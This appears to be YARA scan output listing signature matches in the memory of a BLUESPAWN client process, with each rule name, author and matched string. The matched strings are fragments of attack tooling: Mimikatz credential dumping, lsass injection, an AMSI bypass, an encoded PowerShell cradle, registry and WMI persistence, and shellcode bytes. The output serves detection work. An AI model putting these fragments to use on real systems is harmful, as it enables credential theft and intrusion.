- 0x2c56d0:$x5: p0wnedShellx64
- 0x2c5739:$x5: p0wnedShellx64
- 0x32f827:$x5: p0wnedShellx64
- 0x2c51c2:$x6: Invoke_PsExec()
- 0x2a875b:$x7: Invoke-Mimikatz
- 0x2ac7c5:$x7: Invoke-Mimikatz
- 0x2ae09c:$x7: Invoke-Mimikatz
- 0x2b0e16:$x7: Invoke-Mimikatz
- 0x2b55e4:$x7: Invoke-Mimikatz
- 0x2b56cb:$x7: Invoke-Mimikatz
- 0x2b8170:$x7: Invoke-Mimikatz
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedPotato | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedPotato.cs | Florian Roth | - 0x2c5400:$x1: Invoke-Tater
- 0x2c5419:$x2: P0wnedListener.Execute(WPAD_Proxy);
- 0x2c5449:$x3: -SpooferIP
- 0x32f61e:$x3: -SpooferIP
- 0x2c5462:$x4: TaterCommand()
- 0x32f62d:$x4: TaterCommand()
- 0x2c547d:$x5: FileName = "cmd.exe",
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedExploits | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedExploits.cs | Florian Roth | - 0x2c5661:$x1: Pshell.RunPSCommand(Whoami);
- 0x2c568a:$x2: If succeeded this exploit should popup a System CMD Shell
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedBinaries | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedBinaries.cs | Florian Roth | - 0x2c5893:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x2c5ebf:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x32f906:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x32fd82:$x1: Oq02AB+LCAAAAAAABADs/QkW3LiOLQBuRUsQR1H731gHMQOkFGFnvvrdp/O4sp6tkDiAIIjhAryu4z6PVOtxHuXz3/xT6X9za/Df/Hsa/JT/9
- 0x2c5f39:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f
- 0x32fdf2:$x2: wpoWAB+LCAAAAAAABADs/QeyK7uOBYhORUNIenL+E2vBA0ympH3erY4f8Tte3TpbUiY9YRbcGK91vVKtr+tV3v/B/yr/m1vD/+DvNOVb+V/f
- 0x2c5fb2:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98
- 0x32fe61:$x3: mo0MAB+LCAAAAAAABADsXQl24zqu3YqXII6i9r+xJ4AACU4SZcuJnVenf/9OxbHEAcRwcQGu62NbHsrax/Iw+3/hP5b+VzuH/4WfVeDf8n98
- 0x2c602b:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+
- 0x32fed0:$x4: LE4CAB+LCAAAAAAABADsfQmW2zqu6Fa8BM7D/jf2hRmkKNuVm/Tt9zunkipb4giCIGb2/prhFUt5hVe+/sNP4b+pVvwPn+OQp/LT9ge/+
- 0x2c60a1:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/
- 0x32ff3c:$x5: XpMCAB+LCAAAAAAABADsfQeWIzmO6FV0hKAn73+xL3iAwVAqq2t35r/tl53VyhCDFoQ3Y7zW9Uq1vq5Xef/CT+X/59bwFz6nKU/lp+8P/
- 0x2c6117:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR
- 0x32ffa8:$x6: STwAAB+LCAAAAAAABADtWwmy6yoO3YqXgJjZ/8ZaRwNgx/HNfX/o7qqUkxgzCM0SmLR2jHBQzkc4En9xZbvHUuSLMnWv9ateK/70ilStR
- 0x2c618d:$x7: namespace p0wnedShell
- 0x2c6396:$x7: namespace p0wnedShell
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedAmsiBypass | p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedAmsiBypass.cs | Florian Roth | - 0x2c4f15:$x1: Program.P0wnedPath()
- 0x2c6375:$x1: Program.P0wnedPath()
- 0x2c618d:$x2: namespace p0wnedShell
- 0x2c6396:$x2: namespace p0wnedShell
- 0x2c63b8:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
- 0x330189:$x3: H4sIAAAAAAAEAO1YfXRUx3WflXalFazQgiVb5nMVryzxIbGrt/rcFRZIa1CQYEFCQnxotUhP2pX3Q337HpYotCKrPdbmoQQnkOY0+BQCNKRpe
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | p0wnedShell_outputs | p0wnedShell Runspace Post Exploitation Toolkit - from files p0wnedShell.cs, p0wnedShell.cs | Florian Roth | - 0x2c6623:$s1: [+] For this attack to succeed, you need to have Admin privileges.
- 0x2c6672:$s2: [+] This is not a valid hostname, please try again
- 0x2c66b1:$s3: [+] First return the name of our current domain.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_PowerUp | Auto-generated rule - file PowerUp.ps1 | Florian Roth | - 0x2cc1b1:$s1: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list vdir /text:vdir.name" | % {
- 0x2cc210:$s2: iex "$Env:SystemRoot\System32\inetsrv\appcmd.exe list apppools /text:name" | % {
- 0x2cc26e:$s3: if ($Env:PROCESSOR_ARCHITECTURE -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QQBNAEQANgA0AA==')))) {
- 0x2cc2f8:$s4: C:\Windows\System32\InetSRV\appcmd.exe list vdir /text:physicalpath |
- 0x2cc34b:$s5: if (Test-Path ("$Env:SystemRoot\System32\inetsrv\appcmd.exe"))
- 0x2cc397:$s6: if (Test-Path ("$Env:SystemRoot\System32\InetSRV\appcmd.exe")) {
- 0x2cc3e5:$s7: Write-Verbose "Executing command '$Cmd'"
- 0x2cc41a:$s8: Write-Warning "[!] Target service
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Inveigh_BruteForce | Auto-generated rule - file Inveigh-BruteForce.ps1 | Florian Roth | - 0x2cc614:$s1: Import-Module .\Inveigh.psd1;Invoke-InveighBruteForce -SpooferTarget 192.168.1.11
- 0x2cc673:$s2: $(Get-Date -format 's') - Attempting to stop HTTP listener")|Out-Null
- 0x2cc6c5:$s3: Invoke-InveighBruteForce -SpooferTarget 192.168.1.11 -Hostname server1
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_Shellcode | Auto-generated rule - file Invoke-Shellcode.ps1 | Florian Roth | - 0x2c6f54:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2cc8e0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2ccbdb:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x3309d2:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2cc91c:$s2: Get-ProcAddress kernel32.dll OpenProcess
- 0x2cc951:$s3: msfpayload windows/exec CMD="cmd /k calc" EXITFUNC=thread C | sed '1,6d;s/[";]//g;s/\\/,0/g' | tr -d '\n' | cut -c2-
- 0x2cc9d3:$s4: inject shellcode into
- 0x334b94:$s4: inject shellcode into
- 0x2c7bb0:$s5: Injecting shellcode
- 0x2cc9f5:$s5: Injecting shellcode
- 0x331352:$s5: Injecting shellcode
- 0x334bac:$s5: Injecting shellcode
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_Mimikatz | Auto-generated rule - file Invoke-Mimikatz.ps1 | Florian Roth | - 0x2c6f54:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2cc8e0:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2ccbdb:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x3309d2:$s1: Get-ProcAddress kernel32.dll WriteProcessMemory
- 0x2ccc17:$s2: ps | where { $_.Name -eq $ProcName } | select ProcessName, Id, SessionId
- 0x2ccc6c:$s3: privilege::debug exit
- 0x334d60:$s3: privilege::debug exit
- 0x2ccc8e:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x2cd113:$s4: Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x2ccccd:$s5: Invoke-Mimikatz -DumpCreds
- 0x2cccf4:$s6: | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_RelfectivePEInjection | Auto-generated rule - file Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x2ccf36:$x1: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName (Get-Content targetlist.txt)
- 0x2ccfb4:$x2: Invoke-ReflectivePEInjection -PEBytes $PEBytes -FuncReturnType WString -ComputerName Target.local
- 0x2cd022:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken
- 0x335035:$x3: } = Get-ProcAddress Advapi32.dll OpenThreadToken
- 0x2cd05f:$x4: Invoke-ReflectivePEInjection -PEBytes $PEBytes -ProcName lsass -ComputerName Target.Local
- 0x2cd0c5:$s5: $PEBytes = [IO.File]::ReadAllBytes('DemoDLL_RemoteProcess.dll')
- 0x2cd111:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
- 0x335106:$s6: = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Persistence | Auto-generated rule - file Persistence.ps1 | Florian Roth | - 0x2cd310:$s1: "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```
- 0x335256:$s1: "`"```$Filter=Set-WmiInstance -Class __EventFilter -Namespace ```"root\subscription```
- 0x2cd373:$s2: }=$PROFILE.AllUsersAllHosts;${
- 0x3352af:$s2: }=$PROFILE.AllUsersAllHosts;${
- 0x2cd39e:$s3: C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
- 0x3352d0:$s3: C:\PS> $ElevatedOptions = New-ElevatedPersistenceOption -Registry -AtStartup
- 0x2cd3f7:$s4: = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture
- 0x33531f:$s4: = gwmi Win32_OperatingSystem | select -ExpandProperty OSArchitecture
- 0x2cd448:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))
- 0x335366:$s5: -eq $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAAxADQAQwA='))))
- 0x2cd4ac:$s6: }=$PROFILE.CurrentUserAllHosts;${
- 0x3353c0:$s6: }=$PROFILE.CurrentUserAllHosts;${
- 0x2cd4da:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2ce30c:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x3353e4:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x335e77:$s7: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2cd52f:$s8: [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Invoke_Mimikatz_RelfectivePEInjection | Auto-generated rule - from files Invoke-Mimikatz.ps1, Invoke-RelfectivePEInjection.ps1 | Florian Roth | - 0x2cd7ed:$s1: [IntPtr]$DllAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
- 0x2cd867:$s2: if ($GetCommandLineAAddr -eq [IntPtr]::Zero -or $GetCommandLineWAddr -eq [IntPtr]::Zero)
- 0x2cd8cc:$s3: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xbb)
- 0x2cd93e:$s4: Function Import-DllInRemoteProcess
- 0x2cd96d:$s5: FromBase64String('QwBvAG4AdABpAG4AdQBlAA==')))
- 0x2cd9a8:$s6: [Byte[]]$Shellcode2 = @(0xc6, 0x03, 0x01, 0x83, 0xec, 0x20, 0x83, 0xe4, 0xc0, 0xbb)
- 0x2cda08:$s7: [System.Runtime.InteropServices.Marshal]::FreeHGlobal($TokenPrivilegesMem)
- 0x2cda5f:$s8: [System.Runtime.InteropServices.Marshal]::StructureToPtr($CurrAddr, $FinalAddr, $false) | Out-Null
- 0x2cdace:$s9: ::FromBase64String('RABvAG4AZQAhAA==')))
- 0x3358a8:$s9: ::FromBase64String('RABvAG4AZQAhAA==')))
- 0x2cdb03:$s10: Write-Verbose "PowerShell ProcessID: $PID"
- 0x2cdb3a:$s11: [IntPtr]$ProcAddress = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ReturnValMem, [Type][IntPtr])
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Inveigh_BruteForce_2 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x2cdd89:$s1: }.NTLMv2_file_queue[0]|Out-File ${
- 0x335aa2:$s1: }.NTLMv2_file_queue[0]|Out-File ${
- 0x2cddb8:$s2: }.NTLMv2_file_queue.RemoveRange(0,1)
- 0x335ac7:$s2: }.NTLMv2_file_queue.RemoveRange(0,1)
- 0x2cdde9:$s3: }.NTLMv2_file_queue.Count -gt 0)
- 0x335aee:$s3: }.NTLMv2_file_queue.Count -gt 0)
- 0x2cde16:$s4: }.relay_running = $false
- 0x335b11:$s4: }.relay_running = $false
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_PowerUp_2 | Auto-generated rule - from files PowerUp.ps1 | Florian Roth | - 0x2cdff9:$s1: if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::
- 0x335c45:$s1: if($MyConString -like $([Text.Encoding]::Unicode.GetString([Convert]::
- 0x2ce04c:$s2: FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {
- 0x335c8e:$s2: FromBase64String('KgBwAGEAcwBzAHcAbwByAGQAKgA=')))) {
- 0x2ce08e:$s3: $Null = Invoke-ServiceStart
- 0x335cc6:$s3: $Null = Invoke-ServiceStart
- 0x2ce0b6:$s4: Write-Warning "[!] Access to service $
- 0x335ce4:$s4: Write-Warning "[!] Access to service $
- 0x2ce0e9:$s5: } = $MyConString.Split("=")[1].Split(";")[0]
- 0x335d0d:$s5: } = $MyConString.Split("=")[1].Split(";")[0]
- 0x2ce122:$s6: } += "net localgroup ${
- 0x335d3c:$s6: } += "net localgroup ${
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Persistence_2 | Auto-generated rule - from files Persistence.ps1 | Florian Roth | - 0x2cd4da:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2ce30c:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x3353e4:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x335e77:$s1: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBPAG4ASQBkAGwAZQA=')
- 0x2ce361:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')
- 0x335ec2:$s2: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBEAGEAaQBsAHkA')
- 0x2ce3b2:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')
- 0x335f09:$s3: FromBase64String('UAB1AGIAbABpAGMALAAgAFMAdABhAHQAaQBjAA==')
- 0x2ce3fb:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- 0x335f48:$s4: [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )]
- 0x2ce453:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))
- 0x335f96:$s5: FromBase64String('UwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAHQATABvAGcAbwBuAA==')))
- 0x2ce4ae:$s6: [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )]
- 0x2ce507:$s7: FromBase64String('TQBlAHQAaABvAGQA')
- 0x336036:$s7: FromBase64String('TQBlAHQAaABvAGQA')
- 0x2ce538:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=')
- 0x33605d:$s8: FromBase64String('VAByAGkAZwBnAGUAcgA=')
- 0x2ce56d:$s9: [Runtime.InteropServices.CallingConvention]::Winapi,
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | ps1_toolkit_Inveigh_BruteForce_3 | Auto-generated rule - from files Inveigh-BruteForce.ps1 | Florian Roth | - 0x2ce782:$s1: ::FromBase64String('TgBUAEwATQA=')
- 0x3361ee:$s1: ::FromBase64String('TgBUAEwATQA=')
- 0x2ce7b1:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))
- 0x336213:$s2: ::FromBase64String('KgBTAE0AQgAgAHIAZQBsAGEAeQAgACoA')))
- 0x2ce7f6:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))
- 0x33624e:$s3: ::FromBase64String('KgAgAGYAbwByACAAcgBlAGwAYQB5ACAAKgA=')))
- 0x2ce83f:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))
- 0x33628d:$s4: ::FromBase64String('KgAgAHcAcgBpAHQAdABlAG4AIAB0AG8AIAAqAA==')))
- 0x2ce88c:$s5: [Byte[]] $HTTP_response = (0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20)`
- 0x2ce8e2:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA
- 0x33631c:$s6: KgAgAGwAbwBjAGEAbAAgAGEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIAAqAA
- 0x2ce92d:$s7: }.bruteforce_running)
- 0x33635d:$s7: }.bruteforce_running)
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Suspicious_PowerShell_Code_1 | Detects suspicious PowerShell code | Florian Roth | - 0x2ca61d:$s4: powershell.exe -w hidden -ep bypass -Enc
- 0x333204:$s4: powershell.exe -w hidden -ep bypass -Enc
- 0x2ca652:$s5: -w hidden -noni -nop -c "iex(New-Object
- 0x33322f:$s5: -w hidden -noni -nop -c "iex(New-Object
- 0x2ca686:$s6: powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run
- 0x333259:$s6: powershell.exe reg add HKCU\software\microsoft\windows\currentversion\run
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | SUSP_PS1_FromBase64String_Content_Indicator | Detects suspicious base64 encoded PowerShell expressions | Florian Roth | - 0x2cba2b:$: ::FromBase64String("H4s
- 0x2cbc5a:$: ::FromBase64String("H4s
- 0x334045:$: ::FromBase64String("H4s
- 0x3341c0:$: ::FromBase64String("H4s
- 0x2cba4f:$: ::FromBase64String("TVq
- 0x33405d:$: ::FromBase64String("TVq
- 0x2cba73:$: ::FromBase64String("UEs
- 0x334075:$: ::FromBase64String("UEs
- 0x2cba97:$: ::FromBase64String("JAB
- 0x33408d:$: ::FromBase64String("JAB
- 0x2cbabb:$: ::FromBase64String("SUVY
- 0x3340a5:$: ::FromBase64String("SUVY
- 0x2cbae0:$: ::FromBase64String("SQBFAF
- 0x3340be:$: ::FromBase64String("SQBFAF
- 0x2cbb07:$: ::FromBase64String("SQBuAH
- 0x3340d9:$: ::FromBase64String("SQBuAH
- 0x2cbb2e:$: ::FromBase64String("PAA
- 0x3340f4:$: ::FromBase64String("PAA
- 0x2cbb52:$: ::FromBase64String("cwBhA
- 0x33410c:$: ::FromBase64String("cwBhA
- 0x2cbb78:$: ::FromBase64String("aWV4
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HTA_with_WScript_Shell | Detects WScript Shell in HTA | Florian Roth | - 0x2b1c74:$s1: <hta:application windowstate="minimize"/>
- 0x2b1e87:$s1: <hta:application windowstate="minimize"/>
- 0x2b5c16:$s1: <hta:application windowstate="minimize"/>
- 0x2b5d70:$s1: <hta:application windowstate="minimize"/>
- 0x2b1caa:$s2: <script>var b=new ActiveXObject("WScript.Shell");
- 0x2b5c42:$s2: <script>var b=new ActiveXObject("WScript.Shell");
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HTA_Embedded | Detects an embedded HTA file | Florian Roth | - 0x2b1c74:$s1: <hta:application windowstate="minimize"/>
- 0x2b1e87:$s1: <hta:application windowstate="minimize"/>
- 0x2b5c16:$s1: <hta:application windowstate="minimize"/>
- 0x2b5d70:$s1: <hta:application windowstate="minimize"/>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | DeepPanda_htran_exe | Hack Deep Panda - htran-exe | Florian Roth | - 0x15d3de:$s3: [SERVER]connection to %s:%d error
- 0x15d40c:$s4: -tran <ConnectPort> <TransmitHost> <TransmitPort>
- 0x15d517:$s11: -slave <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>
- 0x15d594:$s20: -listen <ConnectPort> <TransmitPort>
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | CN_Toolset_NTscan_PipeCmd | Detects a Chinese hacktool from a disclosed toolset - file PipeCmd.exe | Florian Roth | - 0x15b41d:$s2: Please Use NTCmd.exe Run This Program.
- 0x15b46b:$s4: \\.\pipe\%s%s%d
- 0x15b450:$s5: %s\pipe\%s%s%d
- 0x15b487:$s6: %s\ADMIN$\System32\%s%s
- 0x15b487:$s7: %s\ADMIN$\System32\%s
- 0x15b3ea:$s9: PipeCmdSrv.exe
- 0x16c0c6:$s9: PipeCmdSrv.exe
- 0x15b4ab:$s10: This is a service executable! Couldn't start directly.
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | RemCom_RemoteCommandExecution | Detects strings from RemCom tool | Florian Roth | - 0x15b46b:$: \\.\pipe\%s%s%d
- 0x16c11f:$: \\.\pipe\%s%s%d
- 0x15b489:$: \ADMIN$\System32\%s%s
- 0x16c133:$: \ADMIN$\System32\%s%s
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | PS_AMSI_Bypass | Detects PowerShell AMSI Bypass | Florian Roth | - 0x2bd6e6:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
- 0x2c0e8f:$s1: .GetField('amsiContext',[Reflection.BindingFlags]'NonPublic,Static').
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JS_Suspicious_Obfuscation_Dropbox | Detects PowerShell AMSI Bypass | Florian Roth | - 0x2bd8ac:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0x2c0fc0:$x1: j"+"a"+"v"+"a"+"s"+"c"+"r"+"i"+"p"+"t"
- 0x2bd8df:$x2: script:https://www.dropbox.com
- 0x2c0fe9:$x2: script:https://www.dropbox.com
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JS_Suspicious_MSHTA_Bypass | Detects MSHTA Bypass | Florian Roth | - 0x2bda6d:$s1: mshtml,RunHTMLApplication
- 0x2c10e2:$s1: mshtml,RunHTMLApplication
- 0x2bda93:$s2: new ActiveXObject("WScript.Shell").Run(
- 0x2c10fe:$s2: new ActiveXObject("WScript.Shell").Run(
- 0x2bdac7:$s3: /c start mshta j
- 0x2c1128:$s3: /c start mshta j
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | JavaScript_Run_Suspicious | Detects a suspicious Javascript Run command | Florian Roth | - 0x2bdc55:$s1: w = new ActiveXObject(
- 0x2c1221:$s1: w = new ActiveXObject(
- 0x2bdc78:$s2: w.Run(r);
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mimikatz_Memory_Rule_1 | Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures) | Florian Roth | - 0x2c824d:$s11: sekurlsa::pth
- 0x33188b:$s11: sekurlsa::pth
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | power_pe_injection | PowerShell with PE Reflective Injection | Benjamin DELPY (gentilkiwi) | - 0x113e83:$str_loadlib: 0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9
- 0x1147c8:$str_loadlib: 0x53, 0x48, 0x89, 0xe3, 0x48, 0x83, 0xec, 0x20, 0x66, 0x83, 0xe4, 0xc0, 0x48, 0xb9
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | HKTL_PowerSploit | Detects default strings used by PowerSploit to establish persistence | Markus Neis | - 0xeb1e:$ps: function
- 0x212b5:$ps: function
- 0x21525:$ps: function
- 0x2302a:$ps: Function
- 0x23105:$ps: Function
- 0x3d778:$ps: function
- 0x3d796:$ps: function
- 0x3e5dd:$ps: function
- 0x3ee3d:$ps: function
- 0x427fb:$ps: function
- 0x58982:$ps: function
- 0x589f3:$ps: function
- 0x58f82:$ps: function
- 0x58fcc:$ps: function
- 0x732a3:$ps: function
- 0x73f3d:$ps: function
- 0x78b59:$ps: function
- 0x78f05:$ps: function
- 0x79ef8:$ps: Function
- 0x7a4fc:$ps: Function
- 0x7af64:$ps: function
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | apt_equation_equationlaser_runtimeclasses | Rule to detect the EquationLaser malware | unknown | - 0x14d8a5:$a1: ?a73957838_2@@YAXXZ
- 0x14db73:$a1: ?a73957838_2@@YAXXZ
- 0x14d8c5:$a2: ?a84884@@YAXXZ
- 0x14db89:$a2: ?a84884@@YAXXZ
- 0x14d8e0:$a3: ?b823838_9839@@YAXXZ
- 0x14db9a:$a3: ?b823838_9839@@YAXXZ
- 0x14d901:$a4: ?e747383_94@@YAXXZ
- 0x14dbb1:$a4: ?e747383_94@@YAXXZ
- 0x14d920:$a5: ?e83834@@YAXXZ
- 0x14dbc6:$a5: ?e83834@@YAXXZ
- 0x14d93b:$a6: ?e929348_827@@YAXXZ
- 0x14dbd7:$a6: ?e929348_827@@YAXXZ
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | EquationDrug_HDDSSD_Op | EquationDrug - HDD/SSD firmware operation - nls_933w.dll | Florian Roth @4nc4p | - 0x14f02b:$s0: nls_933w.dll
- 0x14fbea:$s0: nls_933w.dll
- 0x14fcfa:$s0: nls_933w.dll
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | Mimipenguin_SH | Detects Mimipenguin Password Extractor - Linux | Florian Roth | - 0x2c4464:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x32eb16:$s1: $(echo $thishash | cut -d'$' -f 3)
- 0x2c4493:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x32eb3b:$s2: ps -eo pid,command | sed -rn '/gnome\-keyring\-daemon/p' | awk
- 0x2c44de:$s3: MimiPenguin Results:
- 0x32eb7c:$s3: MimiPenguin Results:
|
| Process Memory Space: BLUESPAWN-client-x86.exe PID: 3132 | CobaltStrike_Unmodifed_Beacon | Detects unmodified CobaltStrike beacon DLL | yara@s3c.za.net | - 0x2a26ee:$loader_export: ReflectiveLoader
- 0x2a2abc:$loader_export: ReflectiveLoader
- 0x2b9c46:$loader_export: ReflectiveLoader
- 0x2b9d4d:$loader_export: ReflectiveLoader
- 0x2b9d8b:$loader_export: ReflectiveLoader
- 0x2baedf:$loader_export: ReflectiveLoader
- 0x2baf9b:$loader_export: ReflectiveLoader
- 0x2bafc5:$loader_export: ReflectiveLoader
- 0x2bafed:$loader_export: ReflectiveLoader
- 0x2bb01e:$loader_export: ReflectiveLoader
- 0x2bb046:$loader_export: ReflectiveLoader
- 0x2bb07a:$loader_export: ReflectiveLoader
